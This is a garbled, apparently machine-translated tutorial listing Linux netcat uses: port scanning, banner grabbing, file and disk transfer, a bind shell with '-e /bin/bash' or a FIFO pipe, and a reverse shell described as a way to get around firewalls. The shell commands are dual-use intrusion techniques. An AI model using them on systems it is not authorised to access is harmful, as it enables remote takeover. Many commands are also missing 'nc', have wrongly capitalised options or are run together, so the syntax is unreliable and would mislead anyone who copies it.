The Ps.ubuntu comes with a NETCAT-OPENBSD version with no-c/-e parameters.
PSS. Online markdown Editor Bug What's going on ... the "#" sign still shows
# #参数
Want to connect to a place:nc [-options] hostname port[s] [ports] …
Bind port waits for connection:nc -l port [-options] [hostname] [port]
- -g< Gateway: Set up a router hop communication gateway, set up 8;
- The number of-g<: Set the source route-pointing device, which is a multiple of 4;
- -H: Online help;
- -i< delay seconds;: Set the time interval for transmitting information and scanning the communication port;
- -L: Monitor the incoming data using the listening mode;
- -N: Use the IP address directly, not through the domain name server;
- -o< output file;: Specify the name of the file, the data transmitted by the transfer of 16 binary loadline dumped into the file to save;
- -p< communication port;: Set the communication port used by the local host;
- -r: Specifies the source port and destination port are randomly selected;
- -s<: Set the IP address of the local host to send the packet;
- -U: Using UDP transport protocol;
- -V: Displays the instruction execution process;
- -w< timeout number of seconds;: Set the time to wait for the connection;
- -Z: Use 0 input/output mode, only when scanning communication ports.
# #用法
[A Server (192.168.1.1) B Client (192.168.1.2)]
# # # #0. Connect to a remote host:
192.168.x.x 80
Connect to the TCP80 port of the 192.168.x.x.
To listen on the local host:
$nc -l 80
Listen for the TCP80 port on this machine.
Timeout control:
Most of the time we don't want the connection to remain, so we can use the-w parameter to specify the idle timeout for the connection, which is immediately a numeric value that represents the number of seconds, and the connection is terminated if the connection exceeds the specified time.
Server
$nc -l 2389
Client
$ nc -w 10 localhost 2389
The connection will be interrupted after 10 seconds.
Note: Do not use the-W and-L parameters on the server side, because the-w parameter will have no effect on the server side.
# # # #1. Port scan
Port scans are often used by system administrators and hackers to discover ports that are open on some machines to help them identify vulnerabilities in the system.
192.168.1.1 21-25
Can be run in TCP or UDP mode, by default the Tcp,-u parameter is adjusted to UDP.
The z parameter tells Netcat to use 0 IO, close the connection immediately after the connection is successful, and no data exchange.
The V parameter refers to the verbose output.
The n parameter tells Netcat not to use DNS to reverse-query the domain name of the IP address.
The above command will print 21 to 25 of all open ports.
127.0.0.1 22localhost [127.0.0.1] 22 (ssh) openSSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
"Ssh-2.0-openssh_5.9p1 debian-5ubuntu1.4" is banner information. Banner is a text that banner is a text message sent to you by a service that you connect to. Banner information is useful when you are trying to identify a vulnerability or the type and version of a service. However, not all services will send banner. Once you find an open port, you can easily grab their banner using the NETCAT connection service.
# # # #2. Chat Server
If you want to talk to your friends, there are a lot of software and information services available for you to use. However, if you do not have such extravagant configuration, such as you in the computer lab, all the external connection is limited, how do you and all the friends sitting in the next room all day to communicate that? Don't be depressed, Netcat provides a way for you to create a chat server, a pre-determined port, so that he can reach you.
Server
$nc -l 20000
The Netcat command initiates a TCP server on port 20000, and all standard outputs and inputs are output to that port. Both the output and the input are shown in this shell.
Client
192.168.1.1 20000
Whatever you type on machine B will appear on machine A.
# # # #3. File transfer
Most of the time, we are trying to transfer files over a network or other tool. There are many ways, like FTP,SCP,SMB and so on, but when you just need to transfer files temporarily or once, it's really worth wasting time installing and configuring a software on your machine. Suppose you want to pass a file file.txt from a to B. A or B can be either a server or a client.
Server
$nc -l 20000 < file.txt
Client
192.168.1.1 20000 > file.txt
Here we create a server on a and redirect the input of netcat to file file.txt, then when any successful connection is made to that port, Netcat will send file contents.
At the client we redirect the output to File.txt, when B connects to A,a to send the file contents, B saves the file contents to file.txt.
There is no need to create a file source as a server, and we can use it in the opposite way. Like the following we send files from B to a, but the server is created on a, this time we only need to redirect the output of the netcat and redirect the input file of B.
B as Server
Server
$nc -l 20000 > file.txt
Client
192.168.1.2 20000 < file.txt
# # # #4. Directory transfer
Sending a file is simple, but if we want to send multiple files, or the entire directory, it is as simple as using the compression tool tar, compressed and send the compressed package.
If you want to transfer a directory over the network from A to B.
Server
$tar -cvf – dir_name | nc -l 20000
Client
192.168.1.1 20000 | tar -xvf -
Here on a server, we create a tar archive package and pass it-redirect it in the console, then use the pipeline, redirecting it to Netcat,netcat to send it over the network.
At the client we download the package through the Netcat pipeline and then open the file.
If you want to save bandwidth transfer compression packets, we can use bzip2 or other tools to compress.
Server
$tar -cvf – dir_name| bzip2 -z | nc -l 20000
Compression via BZIP2
Client
$nc -n 192.168.1.1 20000 | bzip2 -d |tar -xvf -
# # # #5. Encrypt the data you send over the network
If you are concerned about the security of your data being sent over the Internet, you can encrypt it with a tool such as mcrypt before sending your data.
Server
$nc localhost 20000 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
Encrypt data using the MCrypt tool.
Client
$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 20000
Use the MCrypt tool to decrypt the data.
The above two commands will prompt for a password, ensuring that the same password is used on both ends.
Here we use MCrypt to encrypt, use any other encryption tool can.
# # # #6. Streaming video
While not the best way to generate streaming video, if there are no specific tools on the server, using Netcat, we still have the hope of doing it.
Server
$cat video.avi | nc -l 20000
Here we just read from a video file and redirect the output to the Netcat client
Client
192.168.1.1 20000 | mplayer -vo x11 -cache 3000 -
Here we read the data from the socket and redirect it to MPlayer.
# # # #7, cloning a device
If you have installed a Linux machine and need to repeat the same operation to other machines, and you do not want to repeat the configuration again. Do not need to re-configure the installation process, just start another machine with some boot can drive the disk and clone your machine.
Cloning a Linux PC is simple, assuming your system is on disk/DEV/SDA
Server
$dd if=/dev/sda | nc -l 20000
Client
192.168.1.1 20000 | dd of=/dev/sda
DD is a tool that reads raw data from disk, I redirect its output through the NETCAT server to another machine and writes it to disk, and it copies all of the information along with the partitioned table. But if we have already partitioned and only need to clone the root partition, we can change SDA to sda1,sda2 according to the location of our system root partition. And so on.
# # # #8. Open a shell
We have used remote shell-with telnet and ssh, but if these two commands are not installed and we do not have permission to install them, we can also use Netcat to create a remote shell.
Suppose your netcat supports the-C-E parameter (native netcat)
Server
$nc -l 20000 -e /bin/bash -i
Client
192.168.1.1 20000
Here we have created a NETCAT server and indicated that it was executed when it was successfully connected/bin/bash
If Netcat does not support the-C or-e parameter (OpenBSD netcat), we can still create a remote shell
Server
/tmp/tmp_fifo$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 20000 > /tmp/tmp_fifo
Here we create a FIFO file and then use the Pipeline command to direct the FIFO file content to the shell 2>&1. is used to redirect standard error output and standard output, and then pipe to Netcat to run on port 20000. At this point, we have redirected the output of Netcat to the FIFO file.
Description
Input received from the network is written to the FIFO file
The Cat command reads the FIFO file and sends its contents to the SH command
The SH command process receives input and writes it back to Netcat.
Netcat send output to client via network
As to why it succeeds because the pipeline executes the command in parallel, the FIFO file is used to replace the normal file because the FIFO makes the read wait and if it is a normal file, the cat command ends as soon as possible and begins to read the empty file.
Simply connect to the server on the client
Client
192.168.1.1 20000
You will get a shell prompt on the client
# # # #9. Reverse shell
A reverse shell is a shell that opens on a client. The reverse shell is named because it differs from other configurations, where the server uses the services provided by the customer.
Server
$nc -l 20000
On the client side, simply tell Netcat to execute the shell after the connection is complete.
Client
$nc 192.168.1.1 20000 -e /bin/bash
Now, what's so special about the reverse shell?
The reverse shell is often used to circumvent firewall restrictions, such as blocking inbound connections. For example, I have a private IP address of 192.168.1.1, and I use a proxy server to connect to the external network. If I want to access this machine from outside the network such as 1.2.3.4 Shell, then I will use the reverse shell for this purpose.
# # # #10. Specify the source port
Suppose your firewall filters all the ports except the 25 port, you need to specify the source port using the-P option.
Server
$nc -l 20000
Client
192.168.1.1 20000 25
Using a port within 1024 requires root access.
This command will open port 25 for communication on the client, otherwise the random port will be used.
# # # #11. Specify the Source address
Suppose your machine has multiple addresses, and you want to explicitly specify which address to use for external data traffic. We can use the-s option in Netcat to specify the IP address.
Server
$nc -u -l 20000 < file.txt
Client
$nc -u 192.168.1.1 20000 -s 172.31.100.5 > file.txt
The command binds the address 172.31.100.5.
# # # #12. Static Web Page Server
Create a new Web page, named somepage.html;
Create a new shell script:
while true; do nc -l 80 -q 1 < somepage.html;done
Execute with Root, and then enter 127.0.0.1 in the browser to open to see if it works correctly.
NC directives are often used to remove bugs or tests from managers, so it is easier to use Python's Simplehttpserver module if it is simply a Web server that needs to be in a temporary fashion.
# # # #13. Analog HTTP Headers
$NC www.huanxiangwu.com80GET/http/1.1Host:ispconfig.orgreferrer:mypage.comuser-agent:my-browserhttp/1.1OKDate:tue,Dec200807:23:GMTServer:apache/2.2.6 (Unix) dav/2 Mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 PERL/V5.8.8set-COOKIE:PHPSESSID=BBADORBVIE1GN037IIH6LRDG50; path=/expires: 0cache-control:no-store, No-cache, Must-revalidate, Post-check=0, Pre-check=0pragma:no-cachecache-control: private, Post-check=0, Pre-check=0, max-age= 0set-cookie:own_sid=xrutay, Expires=tue, 23-dec-2008 07: 23:24 GMT; Path=/Vary: Accept-encodingtransfer-encoding:chunkedcontent-type:text/ html[...]
After the NC command, enter the contents of the Red section and press ENTER two times to get the HTTP headers content from the other side.
# # # #13. Netcat Support IPV6
The Netcat-4 and 6 parameters are used to specify the IP address type, respectively, IPV4 and IPV6:
Server
-l 2389
Client
$ nc -4 localhost 2389
Then we can use the Netstat command to view the network situation:
2389tcp 0 0 localhost:2389 localhost:50851 ESTABLISHEDtcp 0 0 localhost:50851 localhost:2389 ESTABLISHED
Next we look at the IPV6:
Server
-l 2389
Client
$ nc -6 localhost 2389
Run the netstat command again:
2389tcp6 0 0 localhost:2389 localhost:33234 ESTABLISHEDtcp6 0 0 localhost:33234 localhost:2389 ESTABLISHED
The prefix is TCP6, which indicates that the address used is IPv6.
# # # #14. Prohibit reading data from standard input in Netcat
This feature uses the-d parameter, see the following example:
Server
-l 2389
Client
-d localhost 2389Hi
The Hi text you entered will not be sent to the server side.
# # # #15. Force Netcat server-side hold-up status
If the client connecting to the server disconnects, the server side also exits.
Server
-l 2389
Client
$ nc localhost 2389^C
Server
-l 2389$
In the above example, the server side also exits immediately when the client disconnects.
We can use the-K parameter to control that the server does not exit because the client disconnects.
Server
-l 2389
Client
$ nc localhost 2389^C
Server
-l 2389
# # # #16. Configuring the Netcat client does not exit because of EOF
The Netcat client can use the-Q parameter to control how long it takes to exit after EOF is received, in seconds:
Client
$nc -q 5 localhost 2389
Now if the client receives EOF, it waits 5 seconds to exit.
# # # #17. Mobile use SMTP to send a letter
When testing an email server, you can use this method to send your email:
25 << EOFHELO host.example.comMAIL FROM: <user@host.example.com>RCPT TO: <user2@host.example.com>DATABody of email..QUITEOF
# # # #18. Via Proxy Server
This command uses the 10.2.3.4:8080 proxy server, which connects to the port of Host.example.com 42.
$nc -x10.2.3.4:8080 -Xconnect host.example.com 42
# # # #19. Using Unix Domain sockets
This line of instructions will create a Unix Domain Socket and receive the information:
$nc -lU /var/tmp/dsocket
Linux NC Command Usage Collection